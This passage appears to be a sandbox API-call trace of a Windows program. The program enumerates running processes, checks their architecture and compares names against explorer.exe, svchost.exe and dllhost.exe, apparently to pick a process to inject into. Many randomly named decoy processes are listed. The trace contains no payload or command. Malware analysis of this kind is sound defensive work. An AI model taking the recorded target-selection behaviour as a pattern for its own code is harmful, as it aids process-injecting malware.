[0223.002] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0223.002] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0223.002] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0223.003] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0223.003] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0223.003] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0223.003] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0223.004] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0223.004] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0223.004] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0223.004] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0223.005] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0223.005] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0223.005] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0223.005] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.006] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0223.006] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.006] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0223.006] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0223.007] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0223.007] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0223.008] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0223.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0223.008] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0223.009] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0223.009] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0223.010] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0223.010] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0223.010] CloseHandle (hObject=0xd8) returned 1 [0223.010] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0223.010] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0223.010] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0223.010] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0223.011] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0223.011] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0223.011] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0223.011] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0223.011] CloseHandle (hObject=0xd8) returned 1 [0223.011] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0223.011] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0223.011] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0223.011] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.012] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0223.012] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0223.012] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0223.012] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0223.013] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0223.013] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0223.013] CloseHandle (hObject=0xd8) returned 1 [0223.013] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0223.013] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0223.013] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0223.013] CloseHandle (hObject=0xd8) returned 1 [0223.013] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0223.014] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0223.014] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0223.014] CloseHandle (hObject=0xd8) returned 1 [0223.014] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0223.015] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0223.015] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0223.015] CloseHandle (hObject=0xd8) returned 1 [0223.015] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0223.015] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0223.015] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0223.015] CloseHandle (hObject=0xd8) returned 1 [0223.015] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0223.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0223.016] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0223.016] CloseHandle (hObject=0xd8) returned 1 [0223.016] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0223.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0223.016] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0223.016] CloseHandle (hObject=0xd8) returned 1 [0223.016] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0223.017] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0223.017] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0223.017] CloseHandle (hObject=0xd8) returned 1 [0223.017] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0223.017] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0223.017] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0223.017] CloseHandle (hObject=0xd8) returned 1 [0223.018] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0223.018] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0223.018] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0223.018] CloseHandle (hObject=0xd8) returned 1 [0223.018] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0223.019] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0223.019] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0223.019] CloseHandle (hObject=0xd8) returned 1 [0223.019] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0223.019] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0223.019] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0223.019] CloseHandle (hObject=0xd8) returned 1 [0223.019] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0223.020] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0223.020] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0223.020] CloseHandle (hObject=0xd8) returned 1 [0223.020] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0223.020] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0223.020] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0223.020] CloseHandle (hObject=0xd8) returned 1 [0223.020] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0223.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0223.021] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0223.021] CloseHandle (hObject=0xd8) returned 1 [0223.021] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0223.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0223.022] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0223.022] CloseHandle (hObject=0xd8) returned 1 [0223.022] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0223.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0223.022] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0223.022] CloseHandle (hObject=0xd8) returned 1 [0223.022] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0223.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0223.023] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0223.023] CloseHandle (hObject=0xd8) returned 1 [0223.023] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0223.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0223.023] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0223.023] CloseHandle (hObject=0xd8) returned 1 [0223.023] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0223.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0223.024] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0223.024] CloseHandle (hObject=0xd8) returned 1 [0223.024] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0223.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0223.024] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0223.025] CloseHandle (hObject=0xd8) returned 1 [0223.025] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0223.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0223.025] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0223.026] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0223.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0223.026] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0223.027] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0223.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0223.027] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0223.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0223.028] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0223.028] CloseHandle (hObject=0xd8) returned 1 [0223.028] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0223.028] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0223.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0223.028] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0223.028] CloseHandle (hObject=0xd8) returned 1 [0223.028] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0223.028] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0223.028] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0223.028] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0223.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0223.029] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0223.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0223.029] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0223.030] CloseHandle (hObject=0xd8) returned 1 [0223.030] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0223.030] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0223.030] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0223.030] CloseHandle (hObject=0xd8) returned 1 [0223.030] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0223.030] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, 